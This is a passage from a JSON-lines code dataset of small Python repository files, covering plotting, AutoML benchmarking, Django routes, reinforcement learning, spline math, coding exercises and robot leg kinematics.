', label=\"Entropy: {0:.2f}\".format(entr))\n\n plt.legend(fontsize='large')\n if args.plot_bars:\n filename = results[\"object_name\"] + \"_class_distribution_bar.png\"\n else:\n filename = results[\"object_name\"] + \"_class_distribution_plot.png\"\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, filename))\n\n distr_plot = cv2.imread(os.path.join(args.detections_dir, filename))\n frames = cv2.imread(os.path.join(args.detections_dir, results[\"object_name\"] + \"_frames.png\"))\n frames = cv2.resize(frames, (0,0), fx=distr_plot.shape[0]/frames.shape[0], fy=distr_plot.shape[0]/frames.shape[0])\n cv2.imwrite(os.path.join(args.detections_dir, filename), cv2.hconcat([distr_plot, frames]))\n\n plt.clf()\n\n plt.title(\"Class distribution boxplot for the object {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n plt.xticks(rotation='vertical', size=15)\n plt.margins(x=0.01)\n plt.yticks(size=15)\n plt.axhline(y=results[\"args\"][\"score_threshold\"], color='black', linestyle='--', label='Score threshold')\n plt.boxplot(smax_vectors.T, labels=labels, patch_artist=True, notch=True)\n plt.legend(fontsize='large')\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, results[\"object_name\"] + \"_class_distribution_boxplot.png\"))\n\n if args.habitat_comparison:\n plt.clf()\n def draw_plot(data, offset, edge_color, fill_color):\n pos = np.arange(data.shape[1])+offset\n bp = ax.boxplot(data, positions=pos, labels=labels, widths=0.3, patch_artist=True, notch=True, showfliers=False)\n for element in ['boxes', 'whiskers', 'fliers', 'medians', 'caps']:\n plt.setp(bp[element], color=edge_color)\n for patch in bp['boxes']:\n patch.set(facecolor=fill_color)\n return bp\n\n fig, ax = plt.subplots(figsize=(20,9))\n plt.title(\"Comparison between real and habitat for the {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n plt.xticks(rotation='vertical', size=15)\n plt.margins(x=0.01)\n plt.yticks(size=15)\n bp_real = draw_plot(smax_vectors.T, -0.2, \"black\", \"blue\")\n plt.xticks([])\n bp_hab = 
draw_plot(np.array(habitat_results[\"detections\"]).T, +0.2,\"black\", \"red\")\n plt.legend([bp_real[\"boxes\"][0], bp_hab[\"boxes\"][0]], [\"Real\", \"Habitat\"], fontsize='xx-large')\n plt.xticks(ha='right')\n plt.tight_layout()\n plt.savefig(os.path.join(args.detections_dir, results[\"object_name\"] + \"_comparison_boxplot.png\"))\n","repo_name":"sokovninn/learning-unknown","sub_path":"yolact_vision/visualize_detection_results.py","file_name":"visualize_detection_results.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27077467939","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n====================\nParallel Script\n====================\n\nThis script run autosklearn in parallel so that to be comparable with JAD\n\nSources:\nhttps://github.com/automl/auto-sklearn/blob/master/examples/example_parallel_manual_spawning.py\nhttps://github.com/automl/auto-sklearn/issues/600\nhttps://github.com/automl/auto-sklearn/issues/203\nhttps://github.com/automl/auto-sklearn/issues/712\nhttps://github.com/automl/auto-sklearn/issues/712\n\n\"\"\"\n\n#importing modules\nimport sys\nimport getopt\nimport multiprocessing\nimport shutil\nimport pandas\nimport copy\nimport pickle\nimport glob\nimport time\n\nimport sklearn.model_selection\nimport sklearn.datasets\nimport sklearn.metrics\n\nimport autosklearn.metrics\nfrom autosklearn.classification import AutoSklearnClassifier\nfrom autosklearn.constants import *\nimport warnings\nwarnings.filterwarnings(\"ignore\", \"Mean of empty slice\")\n\n# small constant to avoid the problem reported in \n# https://github.com/automl/auto-sklearn/issues/203\nsmall_constant = 2\n\n# function for spawning sub-processes\ndef get_spawn_classifier(\n X_train, \n y_train,\n dataset_name,\n time_left_for_this_task,\n tmp_folder,\n output_folder,\n ):\n \n # this function is the actual subprocess\n def spawn_classifier(seed):\n \"\"\"Spawn a subprocess.\n\n auto-sklearn does not take care of spawning worker processes. This\n function, which is called several times in the main block is a new\n process which runs one instance of auto-sklearn.\n \"\"\"\n\n # Use the initial configurations from meta-learning only in one out of\n # the four processes spawned. This prevents auto-sklearn from evaluating\n # the same configurations in different processes.\n if seed == small_constant:\n initial_configurations_via_metalearning = 25\n smac_scenario_args = {}\n else:\n initial_configurations_via_metalearning = 0\n smac_scenario_args = {'initial_incumbent': 'RANDOM'}\n\n # Arguments which are different to other runs of auto-sklearn:\n # 1. all classifiers write to the same output directory\n # 2. shared_mode is set to True, this enables sharing of data between\n # models.\n # 3. 
all instances of the AutoSklearnClassifier must have a different seed!\n        # setting up the automl object\n        automl = autosklearn.classification.AutoSklearnClassifier(\n            time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n            tmp_folder=tmp_folder,\n            output_folder=output_folder,\n            seed=seed,\n            initial_configurations_via_metalearning=initial_configurations_via_metalearning,\n            smac_scenario_args=smac_scenario_args,\n            shared_mode=True, # tmp folder will be shared between seeds\n            delete_tmp_folder_after_terminate=False,\n            ensemble_size=0, # ensembles will be built when all optimization runs are finished\n        )\n        \n        try:\n        \n            # fitting the models\n            automl.fit(X_train.copy(), y_train.copy(), dataset_name=dataset_name, metric = autosklearn.metrics.roc_auc)\n\n            # accessing cv_results_ as described in \n            # https://github.com/automl/auto-sklearn/issues/203\n            cvRes = automl.cv_results_\n            cvRes = pandas.DataFrame.from_dict(cvRes)\n\n            # printing the results\n            cvRes.to_csv('./tmp/results/' + dataset_name + '/cvRes_' + str(seed) + '.csv')\n        \n        except:\n        \n            pass\n    \n    \n    # returning the sub-process\n    return spawn_classifier\n\ndef main(argv):\n\t\n    # reading the command line\n    helpString = 'python python_script_JAD_paper -a <training_set> -b <test_set> -t <time_left_for_this_task> -n <n_processes>'\n    try:\n        opts, args = getopt.getopt(argv,\"ha:b:t:n:\")\n    except getopt.GetoptError:\n        print(helpString)\n        sys.exit(2)\n\t\n    # collecting the arguments\n    for opt, arg in opts:\n        if opt == '-h':\n            print(helpString)\n            sys.exit()\n        elif opt == '-a':\n            training_set = arg\n        elif opt == '-b':\n            test_set = arg\n        elif opt == '-t':\n            time_left_for_this_task = int(arg)\n        elif opt == '-n':\n            n_processes = int(arg)\n\n    # starting counting the time\n    start_time = time.time()\n\t\t\n    # folders\n    tmp_folder = './tmp/autosklearn_tmp/' + training_set\n    output_folder = './tmp/autosklearn_out/' + training_set\n\t\n    # ensuring the folders are empty (?)\n    for tmpDir in [tmp_folder, output_folder]:\n        try:\n            shutil.rmtree(tmpDir)\n        except OSError as e:\n            pass\n\n    # reading the training data\n    trainingData = pandas.read_csv(filepath_or_buffer = './tmp/data/' + training_set + '.csv', index_col = False)\n    y_train = trainingData['target']\n    X_train = trainingData.drop('target', 1)\n\n    # reading the test data\n    testData = pandas.read_csv(filepath_or_buffer = './tmp/data/' + test_set + '.csv', index_col = False)\n    y_test = testData['target']\n    X_test = testData.drop('target', 1)\n    \n    # main block\n    try:\n\n        # creating the sub-process function \n        processes = []\n        spawn_classifier = get_spawn_classifier(\n            X_train, \n            y_train,\n            training_set,\n            time_left_for_this_task,\n            tmp_folder,\n            output_folder\n        )\n        \n        # spawning the subprocesses\n        for i in range(small_constant, small_constant + n_processes):\n            p = multiprocessing.Process(\n                target=spawn_classifier,\n                args=[i]\n            )\n            p.start()\n            processes.append(p)\n        \n        # waiting until all processes are done\n        for p in processes:\n            p.join()\n        \n        # retrieving the cvRes files and concatenating them into a single data frame\n        csvFiles = glob.glob('./tmp/results/' + training_set + '/*.csv')\n        cvRes = pandas.read_csv(filepath_or_buffer = csvFiles[0], index_col = 0)\n        for csvFile in csvFiles[1:]:\n            cvRes_tmp = pandas.read_csv(filepath_or_buffer = csvFile, index_col = 0)\n            cvRes = pandas.concat([cvRes, cvRes_tmp], axis=0, sort=False)\n        \n        # writing the cvRes on file\n        cvRes.to_csv('./tmp/results/' + training_set + '/cvRes.csv', index = False)\n        \n        # building the ensemble\n        automl_ensemble = AutoSklearnClassifier(\n            
time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n delete_tmp_folder_after_terminate=False,\n delete_output_folder_after_terminate=False,\n seed=12345,\n shared_mode=True,\n ensemble_size=50,\n ensemble_nbest=50,\n tmp_folder=tmp_folder,\n output_folder=output_folder\n )\n automl_ensemble.fit_ensemble(\n y_train.copy(),\n task=BINARY_CLASSIFICATION,\n metric=autosklearn.metrics.roc_auc\n )\n \n # building the best model\n automl_bestModel = AutoSklearnClassifier(\n time_left_for_this_task=time_left_for_this_task, # sec., how long should this seed fit process run\n delete_tmp_folder_after_terminate=False,\n delete_output_folder_after_terminate=False,\n shared_mode=True,\n ensemble_size=1,\n ensemble_nbest=1,\n tmp_folder=tmp_folder,\n output_folder=output_folder\n )\n automl_bestModel.fit_ensemble(\n y_train.copy(),\n task=BINARY_CLASSIFICATION,\n metric=autosklearn.metrics.roc_auc\n )\n \n # refitting on the whole dataset\n automl_bestModel.refit(X_train.copy(), y_train.copy())\n automl_ensemble.refit(X_train.copy(), y_train.copy())\n \n # extracting the performances on test set\n automl_bestModel.target_type = 'multilabel-indicator'\n automl_ensemble.target_type = 'multilabel-indicator'\n predictions_bestModel = automl_bestModel.predict_proba(X_test.copy())\n predictions_ensemble = automl_ensemble.predict_proba(X_test.copy())\n \n # saving the results on file\n toSave = pandas.DataFrame({'outcome':y_test})\n toSave['prob_ensemble'] = predictions_ensemble[ : , 0]\n toSave['prob_bestModel'] = predictions_bestModel[ : , 0]\n toSave.to_csv('./tmp/results/' + training_set + '/holdoutRes.csv')\n \n # stopping counting the time\n end_time = time.time()\n \n # saving total time\n total_time = end_time - start_time\n time_file = open('./tmp/results/' + training_set + '/etime.txt',\"w+\")\n tmp = time_file.write('Total time in seconds: %d\\n' % total_time)\n time_file.close()\n \n except Exception as e: \n print(e)\n \n finally:\n \n # removing the tmp results folder\n shutil.rmtree(tmp_folder + '/.auto-sklearn/models')\n\n\n# executing the script\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"GnosisDA/JADBIO-evaluation","sub_path":"code_auto-sklearn/code/python_script_JAD_paper.py","file_name":"python_script_JAD_paper.py","file_ext":"py","file_size_in_byte":8324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17516166985","text":"from django.conf.urls import patterns, url\r\nfrom online import views\r\nimport register.settings\r\n\r\n \r\nurlpatterns = patterns('',\r\n url(r'^$', views.login, name='login'),\r\n url(r'^login/$',views.login,name = 'login'),\r\n url(r'^loginfail/$',views.login,name = 'loginfail'),\r\n url(r'^regist/$',views.regist,name = 'regist'),\r\n url(r'^registfaild/$',views.regist,name = 'regist'),\r\n url(r'^registfaild1/$',views.regist,name = 'regist'),\r\n url(r'^registsuccee/$',views.registsuccee,name = 'registsuccee'),\r\n url(r'^index/$',views.index,name = 'index'),\r\n url(r'^logout/$',views.logout,name = 'logout'),\r\n url(r'^static/(?P.*)$', 'django.views.static.serve',{ 'document_root': register.settings.STATIC_URL }),\r\n)","repo_name":"chenguangxiang/Dragonboard410cProject","sub_path":"Web User Registration and Login System/source/register/online/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} 
+{"seq_id":"36390678336","text":"from matplotlib import artist\nimport torch\nimport gym\nfrom torch import random\nfrom Agent import Agent\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\ndef train(args):\n env = gym.make('CartPole-v0')\n env._max_episode_steps = args.max_steps\n agent = Agent(4, 2)\n \n rewards = []\n avg_rewards = []\n\n for episode in range(args.episodes):\n state = env.reset()\n\n acc_reward = 0\n done = False\n\n while not done:\n action = agent.get_action(state)\n \n next_state, reward, done, _ = env.step(action)\n\n reward += abs(next_state[0]) * -1\n\n agent.store(state, action, next_state, reward, done)\n \n agent.learn()\n \n\n acc_reward += reward\n state = next_state\n\n rewards.append(acc_reward)\n avg_rewards.append(np.mean(rewards[-100:]))\n \n if not args.quiet:\n print(f' - episode {episode + 1}, reward: {acc_reward}, avg reward: {np.mean(rewards[-100:])}, eps: {agent.epsilon}')\n \n if args.plot:\n plt.plot(avg_rewards)\n plt.show()\n \n if args.save is not None:\n agent.save(args.save)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--plot\", action=\"store_true\")\n parser.add_argument(\"-s\", \"--save\", type=str)\n parser.add_argument(\"-m\", \"--max-steps\", type=int, default=200)\n parser.add_argument(\"-e\", \"--episodes\", type=int, required=True)\n\n args = parser.parse_args()\n\n train(args)","repo_name":"mroghani/DQN-CartPole","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38428555090","text":"#coding=utf-8\n#获取Cookie保存到变量\nimport http.cookiejar\nimport urllib\ncookie = http.cookiejar.CookieJar()\n#声明一个CookieJar对象实例来保存cookie\n#利用urllib库的HTTPCookieProcessor对象来创建cookie处理器\nhandler = urllib.request.HTTPCookieProcessor(cookie)\n#通过handler来构建opener\nopener = urllib.request.build_opener(handler)\n#此处的open方法同urllib的urlopen方法,也可以传入request\nresponse = opener.open('http://www.baidu.com')\nfor item in cookie:\n print(item.name,':',item.value)\n","repo_name":"13661892653/workspace","sub_path":"pyCode/craw/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30709694316","text":"# For two strings s and t, we say \"t divides s\" if\n# and only if s = t + ... 
+ t(i.e., t is concatenated with itself one or more times).\n#\n# Given two strings str1 and str2, return the largest string x such that x divides both str1 and str2.\n#\n# Example 1:\n#\n# Input: str1 = \"ABCABC\", str2 = \"ABC\"\n# Output: \"ABC\"\n# Example 2: Input: str1 = \"ABABAB\", str2 = \"ABAB\"\n# Output: \"AB\"\n# Example 3: Input: str1 = \"LEET\", str2 = \"CODE\"\n# Output: \"\"\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\ndef gcd_strings(str1: str, str2: str):\n if str1 + str2 != str2 + str1:\n return \"\"\n divisor = gcd(len(str1), len(str2))\n\n return str2[:divisor]\n\n# from math import gcd\n\n# print(gcd(10, 30))\n\n\nprint(gcd_strings(\"ABABABAB\", \"ABAB\"))\n\n","repo_name":"pradeep-automation/Python-Practice","sub_path":"greatest_common_div_strings.py","file_name":"greatest_common_div_strings.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41748582679","text":"import os\nimport shutil\nfrom typing import List\n\ndef get_subdirs(directory: str) -> List[str]:\n return list(filter(lambda v: os.path.isdir(v), os.listdir(directory)))\n\ndef main():\n # Throw if the folder that we want to use already exists\n if os.path.exists(\"./compiled-folder\"):\n print(\"./compiled-folder exists! Please remove this folder so the program can work properly!\")\n exit(1)\n os.mkdir(\"./compiled-folder\")\n \n # Get all of the folders within the root directory\n file_structure = []\n for root, _, files in os.walk(\".\"):\n if root == \".\": continue\n for name in files:\n file_structure.append(os.path.join(root, name).replace(\"\\\\\", \"/\"))\n\n for src in file_structure:\n # Set up target directory for copying\n tgt = src.split(\"/\"); tgt[1] = \"compiled-folder\"; tgt = \"/\".join(tgt)\n os.makedirs(os.path.dirname(tgt), exist_ok=True)\n if os.path.isfile(tgt):\n # Append data if file already exists\n try:\n sf = open(src, 'r')\n tf = open(tgt, \"a\")\n tf.write(\"\\n\" + sf.read())\n except:\n # Throw and remove tree\n shutil.rmtree(\"./compiled-folder\")\n print(\"Error while appending file data!\")\n exit(1)\n finally:\n # Close files\n sf.close()\n tf.close()\n else:\n # Copy files\n shutil.copy(src, tgt)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sparib/folder-compiler","sub_path":"folder-compiler.py","file_name":"folder-compiler.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11565822349","text":"from firebase import firebase\r\nfrom kivy.app import App\r\nfrom kivy.uix.label import Label\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.audio import SoundLoader\r\n\r\n\r\n\r\nclass SensorData (Label):\r\n def update (self, *args):\r\n status = firebase.FirebaseApplication('https:REALTIME_DATABASE_URL', None).get('/DATA', None)\r\n self.font_size = ('30sp')\r\n if status == 1:\r\n self.text = \"Thief Spotted!!\"\r\n self.color= 1, 0, 0, 1\r\n sound = SoundLoader.load('beep.wav').play()\r\n else :\r\n self.color = 1, 1, 1, 1\r\n self.text = \"EveryThing Look Fine So Far ..\"\r\n\r\nclass MyApp (App):\r\n def build(self):\r\n latestUpdate = SensorData()\r\n Clock.schedule_interval(latestUpdate.update, 1) #replace here\r\n return latestUpdate\r\n\r\nif __name__ == '__main__':\r\n app = MyApp()\r\n 
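# hand control to the Kivy event loop; SensorData.update polls Firebase once per second via Clock\r\n    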
app.run()\r\n","repo_name":"iamabdh/SmartGuard","sub_path":"SmartGuard/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38316347193","text":"from scipy import *\nfrom pylab import * \nimport numpy as np\n\n\n\ndef getBaseFunc(u_real, i):\n \"\"\"\n Method that calculates the basefunction \n\n Parameters\n ----------\n u_real : array of floats, nodes in u_i\n i : The index for a \"hot node\"\n\n Raises\n ------\n Exception \"Wrong input\"\n if the \"hot node\" i is outside the interval of u\n\n Returns\n -------\n basefunction N_i^k, function (x)\n The base function for a given \"hot node\" i\n\n \"\"\"\n # Solves fact that extra knots seems to be needed but are not\n u = u_real.copy()\n u = np.append(u,1)\n \n # Handles the last base function separately (Defines it as 1 in endpoint)\n if i == len(u_real) - 3:\n return lambda x: (x == u_real[-3]) + getBaseFuncRec(u,i)(x)\n \n elif i > (len(u_real) - 3) or i < 0:\n raise Exception(\"Wrong input\")\n\n else:\n return getBaseFuncRec(u,i)\n\n# Recursive algorithm to find base function\ndef getBaseFuncRec(u, i, k = 3):\n \"\"\"\n Recursive method that finds the base function corresponding with \n a certain index in the u-vector\n Parameters \n --------\n u : array of floats, nodes in u_i\n i : integer, the index of the relevant node u_i\n k : integer, the degree of the desired polynomial, is decreased with every iteration \n Returns \n -------\n Function (x)\n The base function as a polynomial of degree k\n \n \"\"\" \n if k == 0:\n if u[i-1] == u[i]:\n return lambda x: 0\n else:\n return lambda x: (x >= u[i-1]) * (x < u[i])\n else:\n if (u[i+k-1] - u[i-1]) == 0:\n factor1 = lambda x: 0\n else:\n factor1 = lambda x: (x - u[i-1])/(u[i+k-1] - u[i-1])\n \n if (u[i+k] - u[i]) == 0:\n factor2 = lambda x: 0\n else:\n factor2 = lambda x: (u[i+k] - x)/(u[i+k] - u[i])\n \n return lambda x: factor1(x) * getBaseFuncRec(u, i, k-1)(x) + factor2(x) * getBaseFuncRec(u, i+1, k-1)(x)\n\n\ndef getCubicSpline(x, u, d):\n \"\"\"\n Uses the deBoor algorithm to create splines\n \n Parameters\n ----------\n x : array of floats, array of floats\n the point(s) containd in u, for which the alogorithm computes a spline\n u : array of floats, length K, nodes in u_i\n d : coordinates corresponding to nodes u_0 to u_K-2 \n Raises\n ------\n Exception \"Wrong input\"\n if any index x lays outside the bounds of u\n Returns\n -------\n (s(z), s(y))\n Tuple with coordinates for point(s) x\n \"\"\"\n \n I = np.array([]) \n # Checks if all points are contained within u\n if (x > u[-3]).any() or (x < u[2]).any():\n raise Exception(\"Wrong input\")\n \n \n # Finds and saves all base functions in array base_functions\n base_functions = np.array([])\n for i in range(len(u)-2): #Changed from len(u) - 1\n base_functions = np.append(base_functions, getBaseFunc(u, i))\n \n # Finds hot intervals\n I = []\n for i in range(len(x)-1):\n for j in range(len(u)):\n if (x[i] >= u[j]) and (x[i] < u[j+1]):\n I.append(j)\n \n\n \n s_z = np.array([])\n s_y = np.array([])\n control_points_z = np.array([])\n control_points_y = np.array([])\n bf_result = np.array([])\n for i in range(len(x)-1):\n control_points_z = np.array([])\n control_points_y = np.array([])\n for j in range(4):\n control_points_z = np.append(control_points_z, d[(I[i]-2) + j][0])\n control_points_y = np.append(control_points_y, d[(I[i]-2) + j][1])\n hot_base_functions = base_functions[I[i]-2 : I[i]+2]\n 
bf_result = np.array([])\n            for bf in hot_base_functions:\n                bf_result = np.append(bf_result, bf(x[i]))\n            s_z = np.append(s_z, control_points_z @ bf_result)\n            s_y = np.append(s_y, control_points_y @ bf_result)\n    \n    \n    #Case x is array of size 1\n    if len(I) == 0:\n        for i in range(len(u)):\n            if (x[0] >= u[i]) and (x[0] < u[i+1]):\n                hot_base_functions = base_functions[i-2 : i+2]\n                for j in range(4):\n                    control_points_z = np.append(control_points_z, d[(i-2) + j][0])\n                    control_points_y = np.append(control_points_y, d[(i-2) + j][1])\n                \n                for bf in hot_base_functions:\n                    bf_result = np.append(bf_result, bf(x[0]))\n                s_z = control_points_z @ bf_result\n                s_y = control_points_y @ bf_result\n        \n        \n    # Last control point is multiplied by 1 in endpoint\n    else: \n        s_z = np.append(s_z, d[-1][0])\n        s_y = np.append(s_y, d[-1][1])\n\n    return np.array((s_z, s_y)).T\n\ndef baseFuncSum(x, u):\n    \"\"\"\n    Returns the sum of all base functions in points x\n    Parameters\n    ----------\n    x : array of floats, points for which the algorithm should work\n    u : array of floats, nodes in u_i\n    Returns\n    -------\n    array of floats, sum of all base functions in the given points x\n    \"\"\"\n    base_functions = np.array([])\n    for i in range(len(u)-2):\n        base_functions = np.append(base_functions, getBaseFunc(u, i))\n    \n    result = np.array([])\n    for i in range(len(x)):\n        sum = 0\n        for bf in base_functions:\n            sum += bf(x[i])\n        result = np.append(result, sum)\n    \n    return result\n","repo_name":"Edde333/Scipy-Projects","sub_path":"Project 1 - Splines/base_functions.py","file_name":"base_functions.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74381413201","text":"# Read the file with all Russian words and save a file with the five-letter words\nimport sys, os\n\n\ninput_file = os.path.join(sys.path[0], 'singular.txt') # Input file\noutput_file = os.path.join(sys.path[0], 'five_letters_singular.txt') # Output file\n\nwith open(input_file, 'r', encoding='utf-8') as f:\n    all_words = f.readlines()\n\nwords_count = 0\nwith open(output_file, 'w', encoding='utf-8') as f:\n    for word in all_words:\n        word = word.rstrip()\n        if len(word) == 5:\n            f.write(word + '\\n')\n            words_count += 1\nprint(f'Found {words_count} five-letter words')","repo_name":"avdivo/5_letters","sub_path":"find_5_letters_words.py","file_name":"find_5_letters_words.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5493163565","text":"\nclass Solution:\n\n    def extendPalindrome(self, s: str, leftPointer: int, rightPointer: int, oddPalindrome: bool) -> tuple:\n        extensionCount = 1 if oddPalindrome else 2\n        while(leftPointer >= 0 and rightPointer < len(s) and s[leftPointer]==s[rightPointer]):\n            #we check to see if borders of palindrome can be extended\n            leftPointer -= 1\n            rightPointer += 1\n            extensionCount += 2\n        #return (begin, length) of palindrome found\n        return (leftPointer + 1, extensionCount)\n\n    def longestPalindrome(self, s: str) -> str:\n        longestPalindromeBegin = 0\n        longestPalindromeLength = 1\n\n        for i in range(0, len(s)):\n            #compute largest palindrome centered at i (odd length)\n            (largestOddBegin, largestOddLength) = self.extendPalindrome(s, i-1, i+1, True)\n            if(largestOddLength > longestPalindromeLength):\n                longestPalindromeBegin = largestOddBegin\n                longestPalindromeLength = largestOddLength\n            #compute largest palindrome centered at pair i, i+1 (even length)\n            if(i>=1 and 
s[i]==s[i-1]):\n (largestEvenBegin, largestEvenLength) = self.extendPalindrome(s, i-2, i+1, False)\n if(largestEvenLength > longestPalindromeLength):\n longestPalindromeBegin = largestEvenBegin\n longestPalindromeLength = largestEvenLength\n #now return longest palindrome found\n return s[longestPalindromeBegin:longestPalindromeBegin+longestPalindromeLength]\n ","repo_name":"ArkhamKnightGPC/LeetCodeProblems","sub_path":"5_LongestPalindromicSubstring.py","file_name":"5_LongestPalindromicSubstring.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35273440799","text":"from collections.abc import Sequence\nfrom datetime import datetime\nfrom typing import (\n Any,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Tuple,\n TypeVar,\n Union,\n)\n\nfrom squad.constants import Leg\nfrom squad.exceptions import StateError\nfrom squad.kinematics.base import BodyParameters\nfrom squad.kinematics.forward import foot_xyz\nfrom squad.kinematics.inverse import leg_thetas\n\nfrom .base import BaseState\n\n\nL = TypeVar(\"L\", bound=\"LegStates\")\nT_LegState = TypeVar(\"T_LegState\", bound=\"LegState\")\n\n\nclass LegState(BaseState):\n \"\"\"\n Leg state data for one leg of the robot.\n \"\"\"\n\n __slots__ = (\n \"_leg\",\n \"_x\",\n \"_y\",\n \"_z\",\n \"_hip_theta\",\n \"_femur_theta\",\n \"_leg_theta\",\n )\n\n def __init__(\n self,\n leg: Leg,\n x: float,\n y: float,\n z: float,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self._leg = leg\n self._x = x\n self._y = y\n self._z = z\n self._hip_theta = hip_theta\n self._femur_theta = femur_theta\n self._leg_theta = leg_theta\n\n @property\n def leg(self) -> Leg:\n \"\"\"Leg: The leg with this state object.\"\"\"\n return self._leg\n\n @property\n def x(self) -> float:\n \"\"\"float: The current X-coordinate of the foot.\"\"\"\n return self._x\n\n @property\n def y(self) -> float:\n \"\"\"float: The current Y-coordinate of the foot.\"\"\"\n return self._y\n\n @property\n def z(self) -> float:\n \"\"\"float: The current Z-coordinate of the foot.\"\"\"\n return self._z\n\n @property\n def hip_theta(self) -> float:\n \"\"\"float: The current hip angle for this leg.\"\"\"\n return self._hip_theta\n\n @property\n def femur_theta(self) -> float:\n \"\"\"float: The current femur angle for this leg.\"\"\"\n return self._femur_theta\n\n @property\n def leg_theta(self) -> float:\n \"\"\"float: The current leg angle for this leg.\"\"\"\n return self._leg_theta\n\n def __str_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:\n s_args, s_kws = super().__str_args__()\n s_kws[\"x\"] = self._x\n s_kws[\"y\"] = self._y\n s_kws[\"z\"] = self._z\n s_kws[\"hip_theta\"] = self._hip_theta\n s_kws[\"femur_theta\"] = self._femur_theta\n s_kws[\"leg_theta\"] = self._leg_theta\n return s_args, s_kws\n\n def __repr_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:\n r_args, r_kws = super().__repr_args__()\n r_kws[\"x\"] = self._x\n r_kws[\"y\"] = self._y\n r_kws[\"z\"] = self._z\n r_kws[\"hip_theta\"] = self._hip_theta\n r_kws[\"femur_theta\"] = self._femur_theta\n r_kws[\"leg_theta\"] = self._leg_theta\n return r_args, r_kws\n\n def __hash_params__(self) -> Tuple[Any, ...]:\n return super().__hash_params__() + (self.leg,)\n\n def update_position(\n self,\n x: float,\n y: float,\n z: float,\n **kwargs: Any,\n ) -> None:\n \"\"\"Updates the leg's state for the given foot position.\n\n 
Parameters\n ----------\n x : float\n The new X-coordinate of the foot to set.\n y : float\n The new Y-coordinate of the foot to set.\n z : float\n The new Z-coordinate of the foot to set.\n **kwargs : optional\n Any additional parameters to pass to the :obj:`leg_thetas`\n function.\n\n \"\"\"\n self._x = x\n self._y = y\n self._z = z\n self._hip_theta, self._femur_theta, self._leg_theta = leg_thetas(\n self._leg,\n x,\n y,\n z,\n **kwargs,\n )\n self._timestamp = datetime.now()\n\n def update_orientation(\n self,\n hip_theta: float,\n femur_theta: float,\n leg_theta: float,\n **kwargs: Any,\n ) -> None:\n \"\"\"Updates the leg's state for the given servo angles.\n\n Parameters\n ----------\n hip_theta : float\n The new Hip-angle of the leg to set.\n femur_theta : float\n The new Femur-angle of the leg to set.\n leg_theta : float\n The new Leg-angle of the leg to set.\n **kwargs : optional\n Any additional parameters to pass to the :obj:`foot_xyz`\n function.\n\n \"\"\"\n self._hip_theta = hip_theta\n self._femur_theta = femur_theta\n self._leg_theta = leg_theta\n self._x, self._y, self._z = foot_xyz(\n self._leg,\n hip_theta,\n femur_theta,\n leg_theta,\n **kwargs,\n )\n\n def distance(self, other: \"LegState\") -> float:\n super().distance(other)\n return (\n ((self._x - other._x) ** 2)\n + ((self._y - other._y) ** 2)\n + ((self._z - other._z) ** 2)\n ) ** 0.5\n\n @classmethod\n def from_position(\n cls,\n leg: Leg,\n x: float,\n y: float,\n z: float,\n *,\n timestamp: Optional[datetime] = None,\n **kwargs: Any,\n ) -> \"LegState\":\n \"\"\"Creates a new LegState from the given foot position.\n\n Parameters\n ----------\n leg : Leg\n The leg to create the new state object for.\n x : float\n The X-coordinate of the foot to create the new state for.\n y : float\n The Y-coordinate of the foot to create the new state for.\n z : float\n The Z-coordinate of the foot to create the new state for.\n timestamp : datetime, optional\n The timestamp to use for the new state, if any.\n **kwargs : optional\n Additional keyword arguments to pass to the\n :obj:`leg_thetas` function.\n\n Returns\n -------\n LegState\n The leg state requested, initialized from the given foot\n position.\n\n \"\"\"\n t_hip, t_femur, 